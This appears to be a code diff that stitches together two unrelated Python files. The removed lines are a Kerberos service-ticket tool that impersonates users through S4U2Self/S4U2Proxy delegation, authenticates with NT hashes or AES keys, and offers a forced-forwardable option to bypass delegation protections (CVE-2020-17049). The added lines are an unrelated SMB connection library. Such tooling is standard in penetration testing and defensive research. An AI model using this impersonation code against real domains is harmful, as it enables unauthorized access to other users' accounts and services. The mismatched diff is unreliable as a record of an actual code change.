-        ticketTGT.from_asn1(decodedTGT['ticket'])
-
-        # Get the service ticket
-        ticket = Ticket()
-        ticket.from_asn1(tgs['ticket'])
-
-        apReq = AP_REQ()
-        apReq['pvno'] = 5
-        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
-
-        opts = list()
-        apReq['ap-options'] = constants.encodeFlags(opts)
-        seq_set(apReq, 'ticket', ticketTGT.to_asn1)
-
-        authenticator = Authenticator()
-        authenticator['authenticator-vno'] = 5
-        authenticator['crealm'] = str(decodedTGT['crealm'])
-
-        clientName = Principal()
-        clientName.from_asn1(decodedTGT, 'crealm', 'cname')
-
-        seq_set(authenticator, 'cname', clientName.components_to_asn1)
-
-        now = datetime.datetime.utcnow()
-        authenticator['cusec'] = now.microsecond
-        authenticator['ctime'] = KerberosTime.to_asn1(now)
-
-        encodedAuthenticator = encoder.encode(authenticator)
-
-        # Key Usage 7
-        # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
-        # TGS authenticator subkey), encrypted with the TGS session
-        # key (Section 5.5.1)
-        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
-
-        apReq['authenticator'] = noValue
-        apReq['authenticator']['etype'] = cipher.enctype
-        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
-
-        encodedApReq = encoder.encode(apReq)
-
-        tgsReq = TGS_REQ()
-
-        tgsReq['pvno'] = 5
-        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
-        tgsReq['padata'] = noValue
-        tgsReq['padata'][0] = noValue
-        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
-        tgsReq['padata'][0]['padata-value'] = encodedApReq
-
-        # Add resource-based constrained delegation support
-        paPacOptions = PA_PAC_OPTIONS()
-        paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,))
-
-        tgsReq['padata'][1] = noValue
-        tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
-        tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
-
-        reqBody = seq_set(tgsReq, 'req-body')
-
-        opts = list()
-        # This specified we're doing S4U
-        opts.append(constants.KDCOptions.cname_in_addl_tkt.value)
-        opts.append(constants.KDCOptions.canonicalize.value)
-        opts.append(constants.KDCOptions.forwardable.value)
-        opts.append(constants.KDCOptions.renewable.value)
-
-        reqBody['kdc-options'] = constants.encodeFlags(opts)
-        service2 = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
-        seq_set(reqBody, 'sname', service2.components_to_asn1)
-        reqBody['realm'] = self.__domain
-
-        myTicket = ticket.to_asn1(TicketAsn1())
-        seq_set_iter(reqBody, 'additional-tickets', (myTicket,))
-
-        now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
-
-        reqBody['till'] = KerberosTime.to_asn1(now)
-        reqBody['nonce'] = random.getrandbits(31)
-        seq_set_iter(reqBody, 'etype',
-                     (
-                         int(constants.EncryptionTypes.rc4_hmac.value),
-                         int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
-                         int(constants.EncryptionTypes.des_cbc_md5.value),
-                         int(cipher.enctype)
-                     )
-                     )
-        message = encoder.encode(tgsReq)
-
-        logging.info('\tRequesting S4U2Proxy')
-        r = sendReceive(message, self.__domain, kdcHost)
-
-        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
-
-        cipherText = tgs['enc-part']['cipher']
-
-        # Key Usage 8
-        # TGS-REP encrypted part (includes application session
-        # key), encrypted with the TGS session key (Section 5.4.2)
-        plainText = cipher.decrypt(sessionKey, 8, cipherText)
-
-        encTGSRepPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]
-
-        newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
-
-        # Creating new cipher based on received keytype
-        cipher = _enctype_table[encTGSRepPart['key']['keytype']]
-
-        return r, cipher, sessionKey, newSessionKey
-
-    def run(self):
-
-        # Do we have a TGT cached?
-        tgt = None
-        try:
-            ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
-            logging.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
-            principal = 'krbtgt/%s@%s' % (self.__domain.upper(), self.__domain.upper())
-            creds = ccache.getCredential(principal)
-            if creds is not None:
-                # ToDo: Check this TGT belogns to the right principal
-                TGT = creds.toTGT()
-                tgt, cipher, sessionKey = TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey']
-                oldSessionKey = sessionKey
-                logging.info('Using TGT from cache')
-            else:
-                logging.debug("No valid credentials found in cache. ")
-        except:
-            # No cache present
-            pass
-
-        if tgt is None:
-            # Still no TGT
-            userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
-            logging.info('Getting TGT for user')
-            tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
-                                                                    unhexlify(self.__lmhash), unhexlify(self.__nthash),
-                                                                    self.__aesKey,
-                                                                    self.__kdcHost)
-
-        # Ok, we have valid TGT, let's try to get a service ticket
-        if self.__options.impersonate is None:
-            # Normal TGS interaction
-            logging.info('Getting ST for user')
-            serverName = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
-            tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, self.__kdcHost, tgt, cipher, sessionKey)
-            self.__saveFileName = self.__user
-        else:
-            # Here's the rock'n'roll
+import ntpath
+import socket
+
+from impacket import smb, smb3, nmb, nt_errors, LOG
+from impacket.ntlm import compute_lmhash, compute_nthash
+from impacket.smb3structs import SMB2Packet, SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30, GENERIC_ALL, FILE_SHARE_READ, \
+    FILE_SHARE_WRITE, FILE_SHARE_DELETE, FILE_NON_DIRECTORY_FILE, FILE_OVERWRITE_IF, FILE_ATTRIBUTE_NORMAL, \
+    SMB2_IL_IMPERSONATION, SMB2_OPLOCK_LEVEL_NONE, FILE_READ_DATA , FILE_WRITE_DATA, FILE_OPEN, GENERIC_READ, GENERIC_WRITE, \
+    FILE_OPEN_REPARSE_POINT, MOUNT_POINT_REPARSE_DATA_STRUCTURE, FSCTL_SET_REPARSE_POINT, SMB2_0_IOCTL_IS_FSCTL, \
+    MOUNT_POINT_REPARSE_GUID_DATA_STRUCTURE, FSCTL_DELETE_REPARSE_POINT, FSCTL_SRV_ENUMERATE_SNAPSHOTS, SRV_SNAPSHOT_ARRAY, \
+    FILE_SYNCHRONOUS_IO_NONALERT, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, SMB2_DIALECT_311
+
+
+# So the user doesn't need to import smb, the smb3 are already in here
+SMB_DIALECT = smb.SMB_DIALECT
+
+class SMBConnection:
+    """
+    SMBConnection class
+
+    :param string remoteName: name of the remote host, can be its NETBIOS name, IP or *\\*SMBSERVER*.  If the later,
+           and port is 139, the library will try to get the target's server name.
+    :param string remoteHost: target server's remote address (IPv4, IPv6) or FQDN
+    :param string/optional myName: client's NETBIOS name
+    :param integer/optional sess_port: target port to connect
+    :param integer/optional timeout: timeout in seconds when receiving packets
+    :param optional preferredDialect: the dialect desired to talk with the target server. If not specified the highest
+           one available will be used
+    :param optional boolean manualNegotiate: the user manually performs SMB_COM_NEGOTIATE
+
+    :return: a SMBConnection instance, if not raises a SessionError exception
+    """
+
+    def __init__(self, remoteName='', remoteHost='', myName=None, sess_port=nmb.SMB_SESSION_PORT, timeout=60, preferredDialect=None,
+                 existingConnection=None, manualNegotiate=False):
+
+        self._SMBConnection = 0
+        self._dialect       = ''
+        self._nmbSession    = 0
+        self._sess_port     = sess_port
+        self._myName        = myName
+        self._remoteHost    = remoteHost
+        self._remoteName    = remoteName
+        self._timeout       = timeout
+        self._preferredDialect = preferredDialect
+        self._existingConnection = existingConnection
+        self._manualNegotiate = manualNegotiate
+        self._doKerberos = False
+        self._kdcHost = None
+        self._useCache = True
+        self._ntlmFallback = True
+
+        if existingConnection is not None:
+            # Existing Connection must be a smb or smb3 instance
+            assert ( isinstance(existingConnection,smb.SMB) or isinstance(existingConnection, smb3.SMB3))
+            self._SMBConnection = existingConnection
+            self._preferredDialect = self._SMBConnection.getDialect()
+            self._doKerberos = self._SMBConnection.getKerberos()
+            return
+
+        ##preferredDialect = smb.SMB_DIALECT
+
+        if manualNegotiate is False:
+            self.negotiateSession(preferredDialect)
+
+    def negotiateSession(self, preferredDialect=None,
+                         flags1=smb.SMB.FLAGS1_PATHCASELESS | smb.SMB.FLAGS1_CANONICALIZED_PATHS,
+                         flags2=smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES,
+                         negoData='\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00'):
+        """
+        Perform protocol negotiation
+
+        :param string preferredDialect: the dialect desired to talk with the target server. If None is specified the highest one available will be used
+        :param string flags1: the SMB FLAGS capabilities
+        :param string flags2: the SMB FLAGS2 capabilities
+        :param string negoData: data to be sent as part of the nego handshake
+
+        :return: True
+        :raise SessionError: if error
+        """
+
+        # If port 445 and the name sent is *SMBSERVER we're setting the name to the IP. This is to help some old
+        # applications still believing
+        # *SMSBSERVER will work against modern OSes. If port is NETBIOS_SESSION_PORT the user better know about i
+        # *SMBSERVER's limitations
+        if self._sess_port == nmb.SMB_SESSION_PORT and self._remoteName == '*SMBSERVER':
+            self._remoteName = self._remoteHost
+        elif self._sess_port == nmb.NETBIOS_SESSION_PORT and self._remoteName == '*SMBSERVER':
+            # If remote name is *SMBSERVER let's try to query its name.. if can't be guessed, continue and hope for the best
+            nb = nmb.NetBIOS()
             try:
-                logging.info('Impersonating %s' % self.__options.impersonate)
-                # Editing below to pass hashes for decryption
-                if self.__additional_ticket is not None:
-                    tgs, cipher, oldSessionKey, sessionKey = self.doS4U2ProxyWithAdditionalTicket(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey,
-                                                                                                  self.__kdcHost, self.__additional_ticket)
+                res = nb.getnetbiosname(self._remoteHost)
+            except:
+                pass
+            else:
+                self._remoteName = res
+
+        if self._sess_port == nmb.NETBIOS_SESSION_PORT:
+            negoData = '\x02NT LM 0.12\x00\x02SMB 2.002\x00'
+
+        hostType = nmb.TYPE_SERVER
+        if preferredDialect is None:
+            # If no preferredDialect sent, we try the highest available one.
+            packet = self.negotiateSessionWildcard(self._myName, self._remoteName, self._remoteHost, self._sess_port,
+                                                   self._timeout, True, flags1=flags1, flags2=flags2, data=negoData)
+            if packet[0:1] == b'\xfe':
+                # Answer is SMB2 packet
+                self._SMBConnection = smb3.SMB3(self._remoteName, self._remoteHost, self._myName, hostType,
+                                                self._sess_port, self._timeout, session=self._nmbSession,
+                                                negSessionResponse=SMB2Packet(packet))
+            else:
+                # Answer is SMB packet, sticking to SMBv1
+                self._SMBConnection = smb.SMB(self._remoteName, self._remoteHost, self._myName, hostType,
+                                              self._sess_port, self._timeout, session=self._nmbSession,
+                                              negPacket=packet)
+        else:
+            if preferredDialect == smb.SMB_DIALECT:
+                self._SMBConnection = smb.SMB(self._remoteName, self._remoteHost, self._myName, hostType,
+                                              self._sess_port, self._timeout)
+            elif preferredDialect in [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30, SMB2_DIALECT_311]:
+                self._SMBConnection = smb3.SMB3(self._remoteName, self._remoteHost, self._myName, hostType,
+                                                self._sess_port, self._timeout, preferredDialect=preferredDialect)
+            else:
+                raise Exception("Unknown dialect %s")
+
+        # propagate flags to the smb sub-object, except for Unicode (if server supports)
+        # does not affect smb3 objects
+        if isinstance(self._SMBConnection, smb.SMB):
+            if self._SMBConnection.get_flags()[1] & smb.SMB.FLAGS2_UNICODE:
+                flags2 |= smb.SMB.FLAGS2_UNICODE
+            self._SMBConnection.set_flags(flags1=flags1, flags2=flags2)
+
+        return True
+
+    def negotiateSessionWildcard(self, myName, remoteName, remoteHost, sess_port, timeout, extended_security=True, flags1=0,
+                                 flags2=0, data=None):
+        # Here we follow [MS-SMB2] negotiation handshake trying to understand what dialects
+        # (including SMB1) is supported on the other end.
+
+        if not myName:
+            myName = socket.gethostname()
+            i = myName.find('.')
+            if i > -1:
+                myName = myName[:i]
+
+        tries = 0
+        smbp = smb.NewSMBPacket()
+        smbp['Flags1'] = flags1
+        # FLAGS2_UNICODE is required by some stacks to continue, regardless of subsequent support
+        smbp['Flags2'] = flags2 | smb.SMB.FLAGS2_UNICODE
+        resp = None
+        while tries < 2:
+            self._nmbSession = nmb.NetBIOSTCPSession(myName, remoteName, remoteHost, nmb.TYPE_SERVER, sess_port,
+                                                     timeout)
+
+            negSession = smb.SMBCommand(smb.SMB.SMB_COM_NEGOTIATE)
+            if extended_security is True:
+                smbp['Flags2'] |= smb.SMB.FLAGS2_EXTENDED_SECURITY
+            negSession['Data'] = data
+            smbp.addCommand(negSession)
+            self._nmbSession.send_packet(smbp.getData())
+
+            try:
+                resp = self._nmbSession.recv_packet(timeout)
+                break
+            except nmb.NetBIOSError:
+                # OSX Yosemite asks for more Flags. Let's give it a try and see what happens
+                smbp['Flags2'] |= smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | smb.SMB.FLAGS2_UNICODE
+                smbp['Data'] = []
+
+            tries += 1
+
+        if resp is None:
+            # No luck, quitting
+            raise Exception('No answer!')
+
+        return resp.get_trailer()
+
+
+    def getNMBServer(self):
+        return self._nmbSession
+
+    def getSMBServer(self):
+        """
+        returns the SMB/SMB3 instance being used. Useful for calling low level methods
+        """
+        return self._SMBConnection
+
+    def getDialect(self):
+        return self._SMBConnection.getDialect()
+
+    def getServerName(self):
+        return self._SMBConnection.get_server_name()
+
+    def getClientName(self):
+        return self._SMBConnection.get_client_name()
+
+    def getRemoteHost(self):
+        return self._SMBConnection.get_remote_host()
+
+    def getRemoteName(self):
+        return self._SMBConnection.get_remote_name()
+
+    def setRemoteName(self, name):
+        return self._SMBConnection.set_remote_name(name)
+
+    def getServerDomain(self):
+        return self._SMBConnection.get_server_domain()
+
+    def getServerDNSDomainName(self):
+        return self._SMBConnection.get_server_dns_domain_name()
+
+    def getServerDNSHostName(self):
+        return self._SMBConnection.get_server_dns_host_name()
+
+    def getServerOS(self):
+        return self._SMBConnection.get_server_os()
+
+    def getServerOSMajor(self):
+        return self._SMBConnection.get_server_os_major()
+
+    def getServerOSMinor(self):
+        return self._SMBConnection.get_server_os_minor()
+
+    def getServerOSBuild(self):
+        return self._SMBConnection.get_server_os_build()
+
+    def doesSupportNTLMv2(self):
+        return self._SMBConnection.doesSupportNTLMv2()
+
+    def isLoginRequired(self):
+        return self._SMBConnection.is_login_required()
+
+    def isSigningRequired(self):
+        return self._SMBConnection.is_signing_required()
+
+    def getCredentials(self):
+        return self._SMBConnection.getCredentials()
+
+    def getIOCapabilities(self):
+        return self._SMBConnection.getIOCapabilities()
+
+    def login(self, user, password, domain = '', lmhash = '', nthash = '', ntlmFallback = True):
+        """
+        logins into the target system
+
+        :param string user: username
+        :param string password: password for the user
+        :param string domain: domain where the account is valid for
+        :param string lmhash: LMHASH used to authenticate using hashes (password is not used)
+        :param string nthash: NTHASH used to authenticate using hashes (password is not used)
+        :param bool ntlmFallback: If True it will try NTLMv1 authentication if NTLMv2 fails. Only available for SMBv1
+
+        :return: None
+        :raise SessionError: if error
+        """
+        self._ntlmFallback = ntlmFallback
+        try:
+            if self.getDialect() == smb.SMB_DIALECT:
+                return self._SMBConnection.login(user, password, domain, lmhash, nthash, ntlmFallback)
+            else:
+                return self._SMBConnection.login(user, password, domain, lmhash, nthash)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def kerberosLogin(self, user, password, domain='', lmhash='', nthash='', aesKey='', kdcHost=None, TGT=None,
+                      TGS=None, useCache=True):
+        """
+        logins into the target system explicitly using Kerberos. Hashes are used if RC4_HMAC is supported.
+
+        :param string user: username
+        :param string password: password for the user
+        :param string domain: domain where the account is valid for (required)
+        :param string lmhash: LMHASH used to authenticate using hashes (password is not used)
+        :param string nthash: NTHASH used to authenticate using hashes (password is not used)
+        :param string aesKey: aes256-cts-hmac-sha1-96 or aes128-cts-hmac-sha1-96 used for Kerberos authentication
+        :param string kdcHost: hostname or IP Address for the KDC. If None, the domain will be used (it needs to resolve tho)
+        :param struct TGT: If there's a TGT available, send the structure here and it will be used
+        :param struct TGS: same for TGS. See smb3.py for the format
+        :param bool useCache: whether or not we should use the ccache for credentials lookup. If TGT or TGS are specified this is False
+
+        :return: None
+        :raise SessionError: if error
+        """
+        import os
+        from impacket.krb5.ccache import CCache
+        from impacket.krb5.kerberosv5 import KerberosError
+        from impacket.krb5 import constants
+
+        self._kdcHost = kdcHost
+        self._useCache = useCache
+
+        if TGT is not None or TGS is not None:
+            useCache = False
+
+        if useCache is True:
+            try:
+                ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
+            except:
+                # No cache present
+                pass
+            else:
+                LOG.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
+                # retrieve domain information from CCache file if needed
+                if domain == '':
+                    domain = ccache.principal.realm['data'].decode('utf-8')
+                    LOG.debug('Domain retrieved from CCache: %s' % domain)
+
+                principal = 'cifs/%s@%s' % (self.getRemoteName().upper(), domain.upper())
+                creds = ccache.getCredential(principal)
+                if creds is None:
+                    # Let's try for the TGT and go from there
+                    principal = 'krbtgt/%s@%s' % (domain.upper(),domain.upper())
+                    creds =  ccache.getCredential(principal)
+                    if creds is not None:
+                        TGT = creds.toTGT()
+                        LOG.debug('Using TGT from cache')
+                    else:
+                        LOG.debug("No valid credentials found in cache. ")
                 else:
-                    tgs, cipher, oldSessionKey, sessionKey = self.doS4U(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost, options.s4u2self, options.alt_service)
-            except Exception as e:
-                logging.debug("Exception", exc_info=True)
-                logging.error(str(e))
-                if str(e).find('KDC_ERR_S_PRINCIPAL_UNKNOWN') >= 0:
-                    logging.error('Probably user %s does not have constrained delegation permisions or impersonated user does not exist' % self.__user)
-                if str(e).find('KDC_ERR_BADOPTION') >= 0:
-                    logging.error('Probably SPN is not allowed to delegate by user %s or initial TGT not forwardable' % self.__user)
+                    TGS = creds.toTGS(principal)
+                    LOG.debug('Using TGS from cache')
 
-                return
-            self.__saveFileName = self.__options.impersonate
+                # retrieve user information from CCache file if needed
+                if user == '' and creds is not None:
+                    user = creds['client'].prettyPrint().split(b'@')[0].decode('utf-8')
+                    LOG.debug('Username retrieved from CCache: %s' % user)
+                elif user == '' and len(ccache.principal.components) > 0:
+                    user = ccache.principal.components[0]['data'].decode('utf-8')
+                    LOG.debug('Username retrieved from CCache: %s' % user)
 
-        self.saveTicket(tgs, oldSessionKey, options.alt_service)
+        while True:
+            try:
+                if self.getDialect() == smb.SMB_DIALECT:
+                    return self._SMBConnection.kerberos_login(user, password, domain, lmhash, nthash, aesKey, kdcHost,
+                                                              TGT, TGS)
+                return self._SMBConnection.kerberosLogin(user, password, domain, lmhash, nthash, aesKey, kdcHost, TGT,
+                                                         TGS)
+            except (smb.SessionError, smb3.SessionError) as e:
+                raise SessionError(e.get_error_code(), e.get_error_packet())
+            except KerberosError as e:
+                if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
+                    # We might face this if the target does not support AES
+                    # So, if that's the case we'll force using RC4 by converting
+                    # the password to lm/nt hashes and hope for the best. If that's already
+                    # done, byebye.
+                    if lmhash == '' and nthash == '' and (aesKey == '' or aesKey is None) and TGT is None and TGS is None:
+                        lmhash = compute_lmhash(password)
+                        nthash = compute_nthash(password)
+                    else:
+                        raise e
+                else:
+                    raise e
+
+    def isGuestSession(self):
+        try:
+            return self._SMBConnection.isGuestSession()
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def logoff(self):
+        try:
+            return self._SMBConnection.logoff()
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
 
 
-if __name__ == '__main__':
-    print(version.BANNER)
+    def connectTree(self,share):
+        if self.getDialect() == smb.SMB_DIALECT:
+            # If we already have a UNC we do nothing.
+            if ntpath.ismount(share) is False:
+                # Else we build it
+                share = ntpath.basename(share)
+                share = '\\\\' + self.getRemoteHost() + '\\' + share
+        try:
+            return self._SMBConnection.connect_tree(share)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
 
-    parser = argparse.ArgumentParser(add_help=True, description="Given a password, hash or aesKey, it will request a "
-                                                                "Service Ticket and save it as ccache")
-    parser.add_argument('identity', action='store', help='[domain/]username[:password]')
-    parser.add_argument('-spn', action="store", required=True, help='SPN (service/server) of the target service the '
-                                                                    'service ticket will' ' be generated for')
-    parser.add_argument('-impersonate', action="store", help='target username that will be impersonated (thru S4U2Self)'
-                                                             ' for quering the ST. Keep in mind this will only work if '
-                                                             'the identity provided in this scripts is allowed for '
-                                                             'delegation to the SPN specified')
-    parser.add_argument('-alt-service', action="store", help='change the service ticket\'s sname')
-    parser.add_argument('-s4u2self', action="store_true", help='only do s4u2self request')
-    parser.add_argument('-additional-ticket', action='store', metavar='ticket.ccache', help='include a forwardable service ticket in a S4U2Proxy request for RBCD + KCD Kerberos only')
-    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
-    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
-    parser.add_argument('-force-forwardable', action='store_true', help='Force the service ticket obtained through '
-                                                                        'S4U2Self to be forwardable. For best results, the -hashes and -aesKey values for the '
-                                                                        'specified -identity should be provided. This allows impresonation of protected users '
-                                                                        'and bypass of "Kerberos-only" constrained delegation restrictions. See CVE-2020-17049')
 
-    group = parser.add_argument_group('authentication')
+    def disconnectTree(self, treeId):
+        try:
+            return self._SMBConnection.disconnect_tree(treeId)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
 
-    group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
-    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
-    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
-                                                       '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
-                                                       'ones specified in the command line')
-    group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication '
-                                                                          '(128 or 256 bits)')
-    group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If '
-                                                                            'ommited it use the domain part (FQDN) specified in the target parameter')
 
-    if len(sys.argv) == 1:
-        parser.print_help()
-        print("\nExamples: ")
-        print("\t./getST.py -spn cifs/contoso-dc -hashes lm:nt contoso.com/user\n")
-        print("\tit will use the lm:nt hashes for authentication. If you don't specify them, a password will be asked")
-        sys.exit(1)
+    def listShares(self):
+        """
+        get a list of available shares at the connected target
 
-    options = parser.parse_args()
+        :return: a list containing dict entries for each share
+        :raise SessionError: if error
+        """
+        # Get the shares through RPC
+        from impacket.dcerpc.v5 import transport, srvs
+        rpctransport = transport.SMBTransport(self.getRemoteName(), self.getRemoteHost(), filename=r'\srvsvc',
+                                              smb_connection=self)
+        dce = rpctransport.get_dce_rpc()
+        dce.connect()
+        dce.bind(srvs.MSRPC_UUID_SRVS)
+        resp = srvs.hNetrShareEnum(dce, 1)
+        return resp['InfoStruct']['ShareInfo']['Level1']['Buffer']
 
-    # Init the example's logger theme
-    logger.init(options.ts)
+    def listPath(self, shareName, path, password = None):
+        """
+        list the files/directories under shareName/path
 
-    if options.debug is True:
-        logging.getLogger().setLevel(logging.DEBUG)
-        # Print the Library's installation path
-        logging.debug(version.getInstallationPath())
-    else:
-        logging.getLogger().setLevel(logging.INFO)
-    if options.alt_service != None and len(options.alt_service.split('/')) != 2:
-        logging.critical('alt-service should be specified as service/host format')
-        sys.exit(1)
-    domain, username, password = parse_credentials(options.identity)
+        :param string shareName: a valid name for the share where the files/directories are going to be searched
+        :param string path: a base path relative to shareName
+        :param string password: the password for the share
 
-    try:
-        if domain is None:
-            logging.critical('Domain should be specified!')
-            sys.exit(1)
+        :return: a list containing smb.SharedFile items
+        :raise SessionError: if error
+        """
 
-        if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
-            from getpass import getpass
+        try:
+            return self._SMBConnection.list_path(shareName, path, password)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
 
-            password = getpass("Password:")
+    def createFile(self, treeId, pathName, desiredAccess=GENERIC_ALL,
+                   shareMode=FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+                   creationOption=FILE_NON_DIRECTORY_FILE, creationDisposition=FILE_OVERWRITE_IF,
+                   fileAttributes=FILE_ATTRIBUTE_NORMAL, impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0,
+                   oplockLevel=SMB2_OPLOCK_LEVEL_NONE, createContexts=None):
+        """
+        Creates a remote file
 
-        if options.aesKey is not None:
-            options.k = True
+        :param HANDLE treeId: a valid handle for the share where the file is to be created
+        :param string pathName: the path name of the file to create
+        :param int desiredAccess: The level of access that is required, as specified in https://msdn.microsoft.com/en-us/library/cc246503.aspx
+        :param int shareMode: Specifies the sharing mode for the open.
+        :param int creationOption: Specifies the options to be applied when creating or opening the file.
+        :param int creationDisposition: Defines the action the server MUST take if the file that is specified in the name
+        field already exists.
+        :param int fileAttributes: This field MUST be a combination of the values specified in [MS-FSCC] section 2.6, and MUST NOT include any values other than those specified in that section.
+        :param int impersonationLevel: This field specifies the impersonation level requested by the application that is issuing the create request.
+        :param int securityFlags: This field MUST NOT be used and MUST be reserved. The client MUST set this to 0, and the server MUST ignore it.
+        :param int oplockLevel: The requested oplock level
+        :param createContexts: A variable-length attribute that is sent with an SMB2 CREATE Request or SMB2 CREATE Response that either gives extra information about how the create will be processed, or returns extra information about how the create was processed.
 
-        executer = GETST(username, password, domain, options)
-        executer.run()
-    except Exception as e:
-        if logging.getLogger().level == logging.DEBUG:
-            import traceback
+        :return: a valid file descriptor
+        :raise SessionError: if error
+        """
+        if self.getDialect() == smb.SMB_DIALECT:
+            _, flags2 = self._SMBConnection.get_flags()
 
-            traceback.print_exc()
-        print(str(e))
+            pathName = pathName.replace('/', '\\')
+            packetPathName = pathName.encode('utf-16le') if flags2 & smb.SMB.FLAGS2_UNICODE else pathName
+
+            ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
+            ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters()
+            ntCreate['Data']       = smb.SMBNtCreateAndX_Data(flags=flags2)
+            ntCreate['Parameters']['FileNameLength']= len(packetPathName)
+            ntCreate['Parameters']['AccessMask']    = desiredAccess
+            ntCreate['Parameters']['FileAttributes']= fileAttributes
+            ntCreate['Parameters']['ShareAccess']   = shareMode
+            ntCreate['Parameters']['Disposition']   = creationDisposition
+            ntCreate['Parameters']['CreateOptions'] = creationOption
+            ntCreate['Parameters']['Impersonation'] = impersonationLevel
+            ntCreate['Parameters']['SecurityFlags'] = securityFlags
+            ntCreate['Parameters']['CreateFlags']   = 0x16
+            ntCreate['Data']['FileName'] = packetPathName
+
+            if flags2 & smb.SMB.FLAGS2_UNICODE:
+                ntCreate['Data']['Pad'] = 0x0
+
+            if createContexts is not None:
+                LOG.error("CreateContexts not supported in SMB1")
+
+            try:
+                return self._SMBConnection.nt_create_andx(treeId, pathName, cmd = ntCreate)
+            except (smb.SessionError, smb3.SessionError) as e:
+                raise SessionError(e.get_error_code(), e.get_error_packet())
+        else:
+            try:
+                return self._SMBConnection.create(treeId, pathName, desiredAccess, shareMode, creationOption,
+                                                  creationDisposition, fileAttributes, impersonationLevel,
+                                                  securityFlags, oplockLevel, createContexts)
+            except (smb.SessionError, smb3.SessionError) as e:
+                raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def openFile(self, treeId, pathName, desiredAccess=FILE_READ_DATA | FILE_WRITE_DATA, shareMode=FILE_SHARE_READ,
+                 creationOption=FILE_NON_DIRECTORY_FILE, creationDisposition=FILE_OPEN,
+                 fileAttributes=FILE_ATTRIBUTE_NORMAL, impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0,
+                 oplockLevel=SMB2_OPLOCK_LEVEL_NONE, createContexts=None):
+        """
+        opens a remote file
+
+        :param HANDLE treeId: a valid handle for the share where the file is to be opened
+        :param string pathName: the path name to open
+        :param int desiredAccess: The level of access that is required, as specified in https://msdn.microsoft.com/en-us/library/cc246503.aspx
+        :param int shareMode: Specifies the sharing mode for the open.
+        :param int creationOption: Specifies the options to be applied when creating or opening the file.
+        :param int creationDisposition: Defines the action the server MUST take if the file that is specified in the name
+        field already exists.
+        :param int fileAttributes: This field MUST be a combination of the values specified in [MS-FSCC] section 2.6, and MUST NOT include any values other than those specified in that section.
+        :param int impersonationLevel: This field specifies the impersonation level requested by the application that is issuing the create request.
+        :param int securityFlags: This field MUST NOT be used and MUST be reserved. The client MUST set this to 0, and the server MUST ignore it.
+        :param int oplockLevel: The requested oplock level
+        :param createContexts: A variable-length attribute that is sent with an SMB2 CREATE Request or SMB2 CREATE Response that either gives extra information about how the create will be processed, or returns extra information about how the create was processed.
+
+        :return: a valid file descriptor
+        :raise SessionError: if error
+        """
+
